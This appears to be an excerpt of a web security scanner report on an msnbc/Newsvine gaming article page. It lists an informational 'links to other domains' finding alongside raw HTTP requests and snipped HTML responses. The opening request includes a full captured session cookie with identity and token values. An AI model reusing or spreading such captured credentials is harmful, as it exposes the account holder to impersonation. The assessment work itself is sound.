Cookie: MSID=Microsoft.CreationDate=01/01/2011 01:19:35&Microsoft.LastVisitDate=01/01/2011 01:19:36&Microsoft.VisitStartDate=01/01/2011 01:19:35&Microsoft.CookieId=5936fd78-823e-4d23-86ed-4e6db6ac8f1c&Microsoft.TokenId=f70fdaf0-f92a-4b5d-a32e-37393a50bd2e&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=WEjTRtQyE2RbGPr3wSXz7nNZUkmlpMF2zgdRrAQjDGrLow75IYgCoKPp0Dke4BARdRMhysBBkqBfjNbGEHMdiBoYU7Kc2hHNjygSbx0kJHl+gULQGlgpsbeVR22upGOm3R8L75QIpsrYykybGJR6KYIIzSOuuNg+yHf6rGhXPyDcFHrRe8gLXYd6p5/dRFiJ0EgqCxmw2x7At0+U3LHgCUJYHEZoS8/B9AS5XPcUHBRc6SFtOFBA6q8Yis5b0yWZrKZLqzuO4ySTFg5EddPpV1r0uOlHxnGcKcc1opZVkrUa7KWeyZBlhT7lqgHZlbNPy7A+iog+s9p1VCpFewEK/lBrDaxq11L75hRaOt7CSuL5y66/DPGn8Kw6rszAiqpXWn5WRjAd2w0EndnN86RsTWwg8aIWj601qIKKmpENPTmUjHSrgNC5F5BRsOZxFFm2FRUNVHM0L+G3xZMkxqdzdnz2F8jkCcwvJmGuDTeOzRH4Nwh+U3W7zNFfJIiCNpr1qToar8E9OUWljynFuensTH2QidHS8+fpvsHVJG7bwy4=&Microsoft.MicrosoftId=0284-8242-0555-1674; MC1=GUID=5b046e389ed92e4ea31425cd07b41623&HASH=386e&LV=201012&V=3; A=I&I=AxUFAAAAAADnCAAA1xAOwzpNh6/jVe+nUDXygw!!; MUID=AD04D6F8B2FF44629973BD0674351135; ixpLightBrowser=0

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 135
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:25:27 GMT
Location: http://www.redacted
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:26 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.redacted">here</a>.</h2>
</body></html>

22.93. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ingame.msnbc.msn.com
Path:	/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Issue detail

The page was loaded from a URL containing a query string:

http://ingame.msnbc.msn.com/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy?chromedomain=technolog

The response contains the following links to other domains:

http://3scruseloose.newsvine.com/
http://4570govt.newsvine.com/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://asterisk2267293.newsvine.com/
http://belzebu.newsvine.com/
http://bit.ly/caLhBE
http://calidudebeautifull.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://darthdon.newsvine.com/
http://dateline.msnbc.com/
http://davidam1262.newsvine.com/
http://devavo.newsvine.com/
http://dizzal.newsvine.com/
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://duncandilnuts.newsvine.com/
http://goorganic2.newsvine.com/
http://hardball.msnbc.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://ingame.newsvine.com/
http://jtj.newsvine.com/
http://keith-1135394.newsvine.com/
http://kinjiru.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/ingame/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=c5916141&rand=416435750&do=msnbc.redacted&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::
http://lovesssappsss.newsvine.com/
http://lovesssappsss1.newsvine.com/
http://marcusarilius.newsvine.com/
http://mikeamerson.newsvine.com/
http://mrwashburn.newsvine.com/
http://msmeredith.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://natalie-fl.newsvine.com/
http://nightly.msnbc.com/
http://nothappy2494184.newsvine.com/
http://ohmy999999.newsvine.com/
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://robert8777.newsvine.com/
http://rodentrack.newsvine.com/
http://ronnkelley.newsvine.com/
http://roquemocan.newsvine.com/
http://rvanderbrink.newsvine.com/
http://sanescience.newsvine.com/
http://scifiwriter7203.newsvine.com/
http://swhitcomb1.newsvine.com/
http://tchoupitoulas1.newsvine.com/
http://tishomingokid.newsvine.com/
http://toastymcgrath.newsvine.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://tooquiet4me2005.newsvine.com/
http://tv.msnbc.com/
http://twitter.com/WindaBenedetti
http://twitter.com/share
http://twitter.com/windabenedetti
http://windabenedetti.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.delish.com/
http://www.everyblock.com/
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy
http://www.facebook.com/todd.kenreck
http://www.hotmail.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.nytimes.com/2009/07/26/magazine/26FOB-2DLove-t.html
http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247
http://www.polls.newsvine.com/_static/css/a13fb07a18e3230078b48aadd2b832aa48d9f59f.css?v=23247
http://www.polls.newsvine.com/_static/js/8279c89e6cbfbec39495cd10332ce1234f0aa2d8.js?v=23247
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/windabenedetti-1131361638.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5917266.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://www.youtube.com/v/71ibW3ibkOI&hl=en_US&fs=1
http://xalener.newsvine.com/
http://yeenveen.newsvine.com/
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted

Request

GET /_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy?chromedomain=technolog HTTP/1.1
Host: ingame.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:08:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109171

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>In-Game - 'My Virtual G
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://ingame.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a13fb07a18e3230078b48aadd2b832aa48d9f59f.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/8279c89e6cbfbec39495cd10332ce1234f0aa2d8.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/ingame/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5916141&rand=416435750&do=msnbc.redacted&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://ingame.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5917266" data-contentId="5917266" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:319px;"><img id="wbenedetti/5917266.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5917266.jpg" width="319" height="478" alt="" />
...[SNIP]...
<p>It seems we here in the U.S. are sliding down the slippery slope toward the kind of infatuation with <a target="_blank" href="http://www.nytimes.com/2009/07/26/magazine/26FOB-2DLove-t.html">virtual</a> and <a target="_blank" href="http://www.nytimes.com/2009/07/26/magazine/26FOB-2DLove-t.html">stuffed girlfriends</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/71ibW3ibkOI&hl=en_US&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div id="vine-inlineCode__5916158" class="inlineCode photo_align_block" data-contentid="5916158"><object width="592" height="346" id="msnbc365677" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0"><param name="movie" value="http://www.msnbc.redacted/id/32545640" />
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy" data-Text="'My Virtual Girlfriend' is real-world creepy">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://scifiwriter7203.newsvine.com/">scifiwriter7203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://natalie-fl.newsvine.com/">Hot-in-Miami</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<div class="normal"><a href="http://DevAvo.newsvine.com/">DevAvo</a>
...[SNIP]...
<div class="normal"><a href="http://swhitcomb1.newsvine.com/">Sean-336944</a>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
<div class="normal"><a href="http://sanescience.newsvine.com/">Sanescience</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Lovesssappsss.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Lovesssappsss.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://duncandilnuts.newsvine.com/">Antonio V</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://roquemocan.newsvine.com/">rmocan</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://lovesssappsss1.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://3scruseloose.newsvine.com/">3scruseloose</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Asterisk2267293.newsvine.com/">Asterisk-2267293</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://xalener.newsvine.com/">xalener</a>
...[SNIP]...
<div class="normal"><a href="http://tchoupitoulas1.newsvine.com/">Tchoupitoulas</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://lovesssappsss1.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://keith-1135394.newsvine.com/">keith-1135394</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://goorganic2.newsvine.com/">go organic</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Calidudebeautifull.newsvine.com/">Calidude69bella</a>
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://rvanderbrink.newsvine.com/">PuddleDuck</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://rodentrack.newsvine.com/">Rodentrack</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://ToastyMcGrath.newsvine.com/">Toasty McGrath</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://4570govt.newsvine.com/">2blunt4drivels</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://belzebu.newsvine.com/">Belzebu</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://tooquiet4me2005.newsvine.com/">MS in VA</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://davidam1262.newsvine.com/">david1262</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MsMeredith.newsvine.com/">Ms.Meredith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://goorganic2.newsvine.com/">go organic</a>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="normal"><a href="http://Kinjiru.newsvine.com/">Kinjiru</a>
...[SNIP]...
<div class="normal"><a href="http://jtj.newsvine.com/">JIM-254362</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Marcusarilius.newsvine.com/">Marcusarilius</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ronnkelley.newsvine.com/">Truckin Ronn</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://mrwashburn.newsvine.com/">mrwashburn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://YeenVeen.newsvine.com/">YeenVeen</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Kinjiru.newsvine.com/">Kinjiru</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="normal"><a href="http://TishomingoKid.newsvine.com/">skip Nicholson, Oklahoma City</a>
...[SNIP]...
<div class="normal"><a href="http://robert8777.newsvine.com/">Robert8777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://nothappy2494184.newsvine.com/">nothappy-2494184</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
